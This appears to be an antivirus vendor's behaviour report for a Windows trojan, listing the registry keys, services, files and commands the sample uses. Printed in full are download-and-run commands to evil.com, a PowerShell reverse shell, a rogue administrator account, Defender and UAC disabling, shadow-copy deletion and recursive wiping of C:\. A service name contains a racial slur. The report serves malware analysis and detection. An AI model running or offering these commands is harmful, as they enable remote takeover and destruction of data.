Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Trojan.Siggen32.45853
Добавлен в вирусную базу Dr.Web:
2026-05-29
Описание добавлено:
2026-05-31
Technical Information
To ensure autorun and distribution
Modifies the following registry keys
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'p1KaLmIg2kB7' = '%APPDATA%\p1KaLmIg2kB7.exe'
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'Upd' = 'powershell -c IEX(New-Object Net.WebClient).DownloadString('http://evil.com/rat.ps1')'
Creates or modifies the following files
<SYSTEM32>\tasks\p1kalmig2kb7
<SYSTEM32>\tasks\upd
Sets the following service settings
[HKLM\SYSTEM\CurrentControlSet\Services\niggakernel] 'Start' = '00000002'
[HKLM\SYSTEM\CurrentControlSet\Services\niggakernel] 'ImagePath' = '%TEMP%\niggakernel.sys'
Creates the following services
'niggakernel' %TEMP%\niggakernel.sys
Modifies master boot record (MBR).
Malicious functions
To complicate detection of its presence in the operating system,
blocks the following features:
User Account Control (UAC)
adds antivirus exclusion:
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Set-MpPreference -DisableRealtimeMonitoring $true}
Executes the following
'%WINDIR%\syswow64\net.exe' user hacker password /add && net localgroup administrators hacker /add
Downloads
http://evil.com/payload.ps1
Launches a large number of processes
Terminates or attempts to terminate
the following system processes:
Modifies file system
Creates the following files
%APPDATA%\p1kalmig2kb7.exe
%TEMP%\niggakernel.sys
%LOCALAPPDATA%\microsoft\windows\actioncentercache\windows-systemtoast-securityandmaintenance_10_0.png
Miscellaneous
Searches for the following windows
ClassName: '' WindowName: 'VMware'
ClassName: '' WindowName: 'VirtualBox'
ClassName: '' WindowName: 'Sandboxie'
ClassName: 'Progman' WindowName: ''
ClassName: 'Proxy Desktop' WindowName: ''
Executes the following
'%WINDIR%\syswow64\schtasks.exe' /create /tn p1KaLmIg2kB7 /tr "%APPDATA%\p1KaLmIg2kB7.exe" /sc onlogon /f
'%WINDIR%\syswow64\sc.exe' create niggakernel binPath= "%TEMP%\niggakernel.sys" type= kernel start= auto
'%WINDIR%\syswow64\sc.exe' start niggakernel
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -NoP -c $c=New-Object Net.Sockets.TCPClient('19#.#68.1.100',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne0){$d=(New-Object Text.ASCIIEncodin...
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){start-process calc}
'%WINDIR%\syswow64\cmd.exe' /c ping -n 10000 127.0.0.1
'%WINDIR%\syswow64\wscript.exe' //B //E:vbscript //Job:x
'%WINDIR%\syswow64\mshta.exe' javascript:while(1){close()}
'%WINDIR%\syswow64\regsvr32.exe' /s /u /i:http://evil.com/x scrobj.dll
'%WINDIR%\syswow64\rundll32.exe' user32.dll,LockWorkStation
'%WINDIR%\syswow64\schtasks.exe' /create /tn Upd /tr "powershell -c 1..100|%{start-process cmd}" /sc minute /mo 1 /f
'%WINDIR%\syswow64\wbem\wmic.exe' process call create "powershell -c while(1){start-process notepad}"
'%WINDIR%\syswow64\bitsadmin.exe' /transfer d /download /priority high http://evil.com/p.exe %tmp%\p.exe && %tmp%\p.exe
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[IO.File]::WriteAllText('$env:temp\spam.txt','x'*1000000)}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Get-Process|Stop-Process -Force}
'%WINDIR%\syswow64\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Upd /t REG_SZ /d "powershell -c IEX(New-Object Net.WebClient).DownloadString('http://evil.com/rat.ps1')" /f
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[Net.DNS]::GetHostEntry('google.com')}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[System.Console]::Beep(1000,500)}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){mkdir $env:temp\x*1000}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Set-ItemProperty -Path 'HKCU:\Control Panel\Desktop' -Name Wallpaper -Value '<SYSTEM32>\0.jpg'}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Start-Sleep -Sec 5;Restart-Computer -Force}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[System.Diagnostics.Process]::Start('powershell','-c while(1){start-process powershell}')}
'%WINDIR%\syswow64\ping.exe' -n 10000 127.0.0.1
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[System.IO.File]::WriteAllBytes('$env:temp\log.bin',[Text.Encoding]::ASCII.GetBytes('spam'*1000))}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Start-Process 'https://google.com'}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){start-process cmd /c dir /s C:\}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){start-process msiexec /quiet /i http://evil.com/package.msi}
'%WINDIR%\syswow64\cmd.exe' /c for /l %i in (1,1,10000) do start
'<SYSTEM32>\taskhostw.exe' KEYROAMING
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[System.Net.WebRequest]::Create('http://evil.com/beacon').GetResponse()}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$u=Get-WmiObject Win32_ComputerSystem; Add-Content $env:temp\log.txt $u.Name}
'%WINDIR%\syswow64\reg.exe' add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Get-Service | Stop-Service -Force}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Get-ChildItem C:\ -Recurse -Force | Remove-Item -Force -Recurse -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\cscript.exe' //nologo //E:vbscript <SYSTEM32>\slmgr.vbs /rearm
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[System.Diagnostics.Process]::Start('shutdown','/r /t 0')}
'%WINDIR%\syswow64\cmd.exe' /c bcdedit /set {default} recoveryenabled no && bcdedit /set {default} bootstatuspolicy ignoreallfailures
'%WINDIR%\syswow64\wbem\wmic.exe' process where name='explorer.exe' call terminate
'%WINDIR%\syswow64\schtasks.exe' /change /tn MicrosoftUpdate /disable
'%WINDIR%\syswow64\reg.exe' delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f
'%WINDIR%\syswow64\cmd.exe' /c vssadmin delete shadows /all /quiet
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Get-WmiObject Win32_Process | ForEach-Object {$_.Terminate()}}
'%WINDIR%\syswow64\cmd.exe' /c wbadmin delete catalog -quiet
'%WINDIR%\syswow64\net1.exe' user hacker password /add && net localgroup administrators hacker /add
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Stop-Computer -Force}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\0 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\1 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\2 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\3 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\4 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\5 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\6 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\cmd.exe'
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\7 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\8 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\9 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\10 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\11 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\12 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\13 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\14 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\15 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\16 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\17 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\18 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\19 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\20 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\21 -ErrorAction SilentlyContinue}
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c while(1){start-process notepad}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\22 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\23 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\24 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\25 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\26 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\27 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\28 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\29 -ErrorAction SilentlyContinue}
'%WINDIR%\explorer.exe'
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\30 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\31 -ErrorAction SilentlyContinue}
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c 1..100|%{start-process cmd}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\32 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\33 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\34 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\35 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\36 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\37 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\38 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\39 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\40 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\41 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\42 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\43 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\44 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\45 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\46 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\47 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\48 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\49 -ErrorAction SilentlyContinue}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.100',4444);$c.GetStream()}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.101',4444);$c.GetStream()}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.102',4444);$c.GetStream()}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.103',4444);$c.GetStream()}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.104',4444);$c.GetStream()}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.105',4444);$c.GetStream()}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.106',4444);$c.GetStream()}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.107',4444);$c.GetStream()}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.108',4444);$c.GetStream()}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.109',4444);$c.GetStream()}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.110',4444);$c.GetStream()}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.111',4444);$c.GetStream()}
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.112',4444);$c.GetStream()}
'%WINDIR%\syswow64\schtasks.exe' /create /tn p1KaLmIg2kB7 /tr "%APPDATA%\p1KaLmIg2kB7.exe" /sc onlogon /f' (with hidden window)
'%WINDIR%\syswow64\sc.exe' create niggakernel binPath= "%TEMP%\niggakernel.sys" type= kernel start= auto' (with hidden window)
'%WINDIR%\syswow64\sc.exe' start niggakernel' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -NoP -c $c=New-Object Net.Sockets.TCPClient('19#.#68.1.100',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne0){$d=(New-Object Text.ASCIIEncodin...' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){start-process calc}' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c ping -n 10000 127.0.0.1' (with hidden window)
'%WINDIR%\syswow64\wscript.exe' //B //E:vbscript //Job:x' (with hidden window)
'%WINDIR%\syswow64\mshta.exe' javascript:while(1){close()}' (with hidden window)
'%WINDIR%\syswow64\regsvr32.exe' /s /u /i:http://evil.com/x scrobj.dll' (with hidden window)
'%WINDIR%\syswow64\rundll32.exe' user32.dll,LockWorkStation' (with hidden window)
'%WINDIR%\syswow64\schtasks.exe' /create /tn Upd /tr "powershell -c 1..100|%{start-process cmd}" /sc minute /mo 1 /f' (with hidden window)
'%WINDIR%\syswow64\wbem\wmic.exe' process call create "powershell -c while(1){start-process notepad}"' (with hidden window)
'%WINDIR%\syswow64\bitsadmin.exe' /transfer d /download /priority high http://evil.com/p.exe %tmp%\p.exe && %tmp%\p.exe' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[IO.File]::WriteAllText('$env:temp\spam.txt','x'*1000000)}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Get-Process|Stop-Process -Force}' (with hidden window)
'%WINDIR%\syswow64\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Upd /t REG_SZ /d "powershell -c IEX(New-Object Net.WebClient).DownloadString('http://evil.com/rat.ps1')" /f' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[Net.DNS]::GetHostEntry('google.com')}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[System.Console]::Beep(1000,500)}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){mkdir $env:temp\x*1000}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Set-ItemProperty -Path 'HKCU:\Control Panel\Desktop' -Name Wallpaper -Value '<SYSTEM32>\0.jpg'}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Start-Sleep -Sec 5;Restart-Computer -Force}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[System.Diagnostics.Process]::Start('powershell','-c while(1){start-process powershell}')}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[System.IO.File]::WriteAllBytes('$env:temp\log.bin',[Text.Encoding]::ASCII.GetBytes('spam'*1000))}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Start-Process 'https://google.com'}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){start-process cmd /c dir /s C:\}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){start-process msiexec /quiet /i http://evil.com/package.msi}' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c for /l %i in (1,1,10000) do start' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[System.Net.WebRequest]::Create('http://evil.com/beacon').GetResponse()}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$u=Get-WmiObject Win32_ComputerSystem; Add-Content $env:temp\log.txt $u.Name}' (with hidden window)
'%WINDIR%\syswow64\reg.exe' add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f' (with hidden window)
'%WINDIR%\syswow64\net.exe' user hacker password /add && net localgroup administrators hacker /add' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Get-Service | Stop-Service -Force}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Get-ChildItem C:\ -Recurse -Force | Remove-Item -Force -Recurse -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\cscript.exe' //nologo //E:vbscript <SYSTEM32>\slmgr.vbs /rearm' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){[System.Diagnostics.Process]::Start('shutdown','/r /t 0')}' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c bcdedit /set {default} recoveryenabled no && bcdedit /set {default} bootstatuspolicy ignoreallfailures' (with hidden window)
'%WINDIR%\syswow64\wbem\wmic.exe' process where name='explorer.exe' call terminate' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1') | IEX}' (with hidden window)
'%WINDIR%\syswow64\schtasks.exe' /change /tn MicrosoftUpdate /disable' (with hidden window)
'%WINDIR%\syswow64\reg.exe' delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Set-MpPreference -DisableRealtimeMonitoring $true}' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c vssadmin delete shadows /all /quiet' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Get-WmiObject Win32_Process | ForEach-Object {$_.Terminate()}}' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c wbadmin delete catalog -quiet' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Stop-Computer -Force}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\0 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\1 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\2 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\3 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\4 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\5 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\6 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\7 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\8 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\9 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\10 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\11 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\12 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\13 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\14 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\15 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\16 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\17 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\18 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\19 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\20 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\21 -ErrorAction SilentlyContinue}' (with hidden window)
